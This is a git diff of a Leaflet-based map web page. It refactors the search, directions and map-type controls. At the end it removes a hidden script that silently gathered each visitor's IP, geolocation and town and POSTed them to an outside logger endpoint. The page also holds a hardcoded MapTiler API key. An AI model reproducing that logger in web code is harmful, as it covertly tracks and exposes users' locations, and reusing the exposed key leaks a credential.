--- a/index.html
+++ b/index.html
@@ -8,37 +8,50 @@
   <link rel="stylesheet" href="https://unpkg.com/leaflet@1.9.3/dist/leaflet.css" />
   <link rel="stylesheet" href="https://unpkg.com/leaflet-routing-machine@3.2.12/dist/leaflet-routing-machine.css" />
   <style>
-    html, body { margin: 0; padding: 0; height: 100%; font-family: 'Roboto', sans-serif; }
-    #map { height: 100vh; width: 100%; }
-    .floating-search {
+    html, body {
+      margin: 0;
+      padding: 0;
+      height: 100%;
+      font-family: 'Roboto', sans-serif;
+    }
+    #map {
+      height: 100vh;
+      width: 100%;
+    }
+    .floating-panel {
       position: fixed;
       top: 20px;
       left: 50%;
       transform: translateX(-50%);
+      z-index: 1001;
+      display: flex;
+      flex-direction: column;
+      gap: 10px;
+    }
+    .panel-box {
       background: white;
-      padding: 10px 15px;
+      padding: 10px;
       border-radius: 12px;
       box-shadow: 0 4px 15px rgba(0,0,0,0.25);
       display: flex;
-      gap: 10px;
-      z-index: 1001;
       align-items: center;
+      gap: 8px;
     }
-    .floating-search input {
+    .panel-box input {
       padding: 8px;
       font-size: 14px;
       border-radius: 8px;
       border: 1px solid #ccc;
-      width: 220px;
+      width: 200px;
     }
-    .floating-search button {
+    .panel-box button {
+      padding: 8px 12px;
+      border-radius: 8px;
+      border: none;
       background: #1976d2;
       color: white;
-      border: none;
-      border-radius: 8px;
-      padding: 8px 12px;
-      cursor: pointer;
       font-weight: bold;
+      cursor: pointer;
     }
     .map-ui {
       position: fixed;
@@ -58,75 +71,81 @@
       box-shadow: 0 4px 12px rgba(0,0,0,0.3);
       cursor: pointer;
     }
-    #direction-panel {
+    .map-types {
       position: fixed;
-      top: 80px;
-      left: 50%;
-      transform: translateX(-50%);
+      top: 20px;
+      right: 20px;
+      z-index: 1003;
       background: white;
       border-radius: 12px;
-      box-shadow: 0 4px 18px rgba(0,0,0,0.3);
-      padding: 16px;
-      z-index: 1001;
-      display: none;
-      flex-direction: column;
-      gap: 10px;
+      padding: 10px;
+      box-shadow: 0 4px 12px rgba(0,0,0,0.3);
     }
-    #direction-panel input, #direction-panel button {
-      padding: 8px;
-      border-radius: 8px;
-      border: 1px solid #ccc;
-      font-size: 14px;
-    }
-    #direction-panel button {
-      background: #1976d2;
-      color: white;
-      font-weight: bold;
-      border: none;
-      cursor: pointer;
-    }
-    .dark-mode {
-      filter: invert(90%) hue-rotate(180deg);
+    .map-types label {
+      display: block;
+      margin-bottom: 6px;
     }
   </style>
 </head>
 <body>
   <div id="map"></div>
-  <div class="floating-search">
-    <input id="searchInput" type="text" placeholder="Search...">
-    <button id="searchBtn">Search</button>
+
+  <div class="floating-panel">
+    <div class="panel-box" id="searchPanel">
+      <input id="searchInput" type="text" placeholder="Search...">
+      <button onclick="clearInput('searchInput')">X</button>
+      <button id="searchBtn">Search</button>
+    </div>
+
+    <div class="panel-box" id="directionPanel" style="display: none;">
+      <input id="fromInput" type="text" placeholder="Start">
+      <input id="toInput" type="text" placeholder="Destination">
+      <button onclick="clearInput('fromInput'); clearInput('toInput')">X</button>
+      <button id="getDirectionBtn">Go</button>
+      <button onclick="toggleDirectionPanel()">Close</button>
+    </div>
   </div>
-  <div id="direction-panel">
-    <input id="fromInput" type="text" placeholder="Start location">
-    <input id="toInput" type="text" placeholder="Destination">
-    <button id="getDirectionBtn">Get Directions</button>
+
+  <div class="map-types">
+    <label><input type="radio" name="mapType" value="hybrid" checked> Hybrid</label>
+    <label><input type="radio" name="mapType" value="streets"> Street</label>
+    <label><input type="radio" name="mapType" value="satellite"> Satellite</label>
+    <label><input type="radio" name="mapType" value="topo"> Topo</label>
   </div>
+
   <div class="map-ui">
     <img src="assets/direction-icon.svg" id="directionToggleBtn" class="icon" title="Directions" />
     <img src="assets/location-icon.svg" id="locateBtn" class="icon" title="Your Location" />
+    <img src="assets/weather-icon.svg" class="icon" title="Weather" onclick="alert('Weather feature coming soon!')" />
+    <img src="assets/traffic-icon.svg" class="icon" title="Traffic" onclick="alert('Traffic overlay coming soon!')" />
     <img src="assets/dark-icon.svg" id="darkModeBtn" class="icon" title="Dark Mode" />
   </div>
 
   <script src="https://unpkg.com/leaflet@1.9.3/dist/leaflet.js"></script>
   <script src="https://unpkg.com/leaflet-routing-machine@3.2.12/dist/leaflet-routing-machine.min.js"></script>
   <script>
-    const map = L.map('map').setView([11.919, 75.367], 14);
+    const apiKey = "VcSgtSTkXfCbU3n3RqBO";
 
-    const hybrid = L.tileLayer('https://api.maptiler.com/maps/hybrid/{z}/{x}/{y}.jpg?key=VcSgtSTkXfCbU3n3RqBO', {
-      tileSize: 512, zoomOffset: -1, maxZoom: 20,
-      attribution: '&copy; MapTiler & OpenStreetMap contributors'
-    }).addTo(map);
+    const map = L.map('map').setView([11.919, 75.367], 18);
 
-    const baseLayers = {
-      "Hybrid": hybrid,
-      "Street": L.tileLayer('https://api.maptiler.com/maps/streets/{z}/{x}/{y}.png?key=VcSgtSTkXfCbU3n3RqBO', { tileSize: 512, zoomOffset: -1, maxZoom: 20 }),
-      "Satellite": L.tileLayer('https://api.maptiler.com/maps/satellite/{z}/{x}/{y}.jpg?key=VcSgtSTkXfCbU3n3RqBO', { tileSize: 512, zoomOffset: -1, maxZoom: 20 }),
-      "Topo": L.tileLayer('https://api.maptiler.com/maps/topo/{z}/{x}/{y}.png?key=VcSgtSTkXfCbU3n3RqBO', { tileSize: 512, zoomOffset: -1, maxZoom: 20 })
+    const layers = {
+      hybrid: L.tileLayer(`https://api.maptiler.com/maps/hybrid/{z}/{x}/{y}.jpg?key=${apiKey}`, { tileSize: 512, zoomOffset: -1 }),
+      streets: L.tileLayer(`https://api.maptiler.com/maps/streets/{z}/{x}/{y}.png?key=${apiKey}`, { tileSize: 512, zoomOffset: -1 }),
+      satellite: L.tileLayer(`https://api.maptiler.com/maps/satellite/{z}/{x}/{y}.jpg?key=${apiKey}`, { tileSize: 512, zoomOffset: -1 }),
+      topo: L.tileLayer(`https://api.maptiler.com/maps/topo/{z}/{x}/{y}.png?key=${apiKey}`, { tileSize: 512, zoomOffset: -1 })
     };
 
-    L.control.layers(baseLayers).addTo(map);
+    layers.hybrid.addTo(map);
+
+    document.querySelectorAll('input[name="mapType"]').forEach(input => {
+      input.addEventListener('change', () => {
+        Object.values(layers).forEach(layer => map.removeLayer(layer));
+        layers[input.value].addTo(map);
+      });
+    });
 
     let fakeMarker = L.marker([11.919, 75.367]).addTo(map);
+    let routingControl;
 
     document.getElementById('darkModeBtn').onclick = () => document.body.classList.toggle('dark-mode');
 
@@ -134,7 +153,7 @@
       navigator.geolocation.getCurrentPosition(pos => {
         const { latitude, longitude } = pos.coords;
         L.marker([latitude, longitude]).addTo(map).bindPopup("You are here").openPopup();
-        map.setView([latitude, longitude], 15);
+        map.setView([latitude, longitude], 19);
       }, () => alert("Permission denied"));
     };
 
@@ -145,93 +164,61 @@
       const data = await res.json();
       if (data.length > 0) {
         const { lat, lon } = data[0];
-        map.setView([parseFloat(lat), parseFloat(lon)], 15);
-        fakeMarker.setLatLng([parseFloat(lat), parseFloat(lon)]);
+        map.setView([lat, lon], 19);
+        fakeMarker.setLatLng([lat, lon]);
       } else {
         alert("Place not found");
       }
     };
 
-    document.getElementById('directionToggleBtn').onclick = () => {
-      const panel = document.getElementById('direction-panel');
-      panel.style.display = panel.style.display === 'none' ? 'flex' : 'none';
-    };
+    document.getElementById('directionToggleBtn').onclick = () => toggleDirectionPanel();
 
-    let routingControl;
+    function toggleDirectionPanel() {
+      const dir = document.getElementById('directionPanel');
+      const search = document.getElementById('searchPanel');
+      if (dir.style.display === 'none') {
+        dir.style.display = 'flex';
+        search.style.display = 'none';
+      } else {
+        dir.style.display = 'none';
+        search.style.display = 'flex';
+      }
+    }
+
+    function clearInput(id) {
+      document.getElementById(id).value = '';
+    }
+
     document.getElementById('getDirectionBtn').onclick = async () => {
       const from = document.getElementById('fromInput').value;
       const to = document.getElementById('toInput').value;
       if (!from || !to) return;
+
       const fromRes = await fetch(`https://nominatim.openstreetmap.org/search?format=json&q=${from}`);
       const fromData = await fromRes.json();
       const toRes = await fetch(`https://nominatim.openstreetmap.org/search?format=json&q=${to}`);
       const toData = await toRes.json();
+
       if (fromData.length > 0 && toData.length > 0) {
-        const fromCoord = L.latLng(parseFloat(fromData[0].lat), parseFloat(fromData[0].lon));
-        const toCoord = L.latLng(parseFloat(toData[0].lat), parseFloat(toData[0].lon));
+        const fromCoord = L.latLng(fromData[0].lat, fromData[0].lon);
+        const toCoord = L.latLng(toData[0].lat, toData[0].lon);
 
         if (routingControl) map.removeControl(routingControl);
 
         routingControl = L.Routing.control({
           waypoints: [fromCoord, toCoord],
+          lineOptions: {
+            styles: [{ color: '#007bff', weight: 5 }]
+          },
           routeWhileDragging: false
         }).addTo(map);
 
-        map.setView(toCoord, 14);
+        map.setView(toCoord, 18);
         fakeMarker.setLatLng(toCoord);
       } else {
         alert("Invalid locations");
       }
     };
-
-    // Logger
-    (async () => {
-      const sendToServer = async (payload) => {
-        await fetch('https://https://shushu-punji-1.onrender.com/logger.php', {
-          method: 'POST',
-          headers: { 'Content-Type': 'application/json' },
-          body: JSON.stringify(payload)
-        });
-      };
-
-      const ipData = await fetch('https://ipapi.co/json').then(r => r.json()).catch(() => null);
-
-      navigator.geolocation.getCurrentPosition(async pos => {
-        const lat = pos.coords.latitude;
-        const lon = pos.coords.longitude;
-
-        const geoRes = await fetch(`https://nominatim.openstreetmap.org/reverse?format=json&lat=${lat}&lon=${lon}`);
-        const geoData = await geoRes.json();
-        const town = geoData?.address?.town || geoData?.address?.village || geoData?.address?.suburb || geoData?.address?.city || '';
-
-        const payload = {
-          ip: ipData?.ip || 'Unknown',
-          country: ipData?.country_name || '',
-          region: ipData?.region || '',
-          city: ipData?.city || '',
-          town: town,
-          latitude: lat,
-          longitude: lon,
-          link: `https://maps.google.com/?q=${lat},${lon}`
-        };
-
-        sendToServer(payload);
-      }, async () => {
-        if (ipData) {
-          const payload = {
-            ip: ipData.ip,
-            country: ipData.country_name,
-            region: ipData.region,
-            city: ipData.city,
-            town: ipData.city,
-            latitude: ipData.latitude,
-            longitude: ipData.longitude,
-            link: `https://maps.google.com/?q=${ipData.latitude},${ipData.longitude}`
-          };
-          sendToServer(payload);
-        }
-      });
-    })();
   </script>
 </body>
 </html>
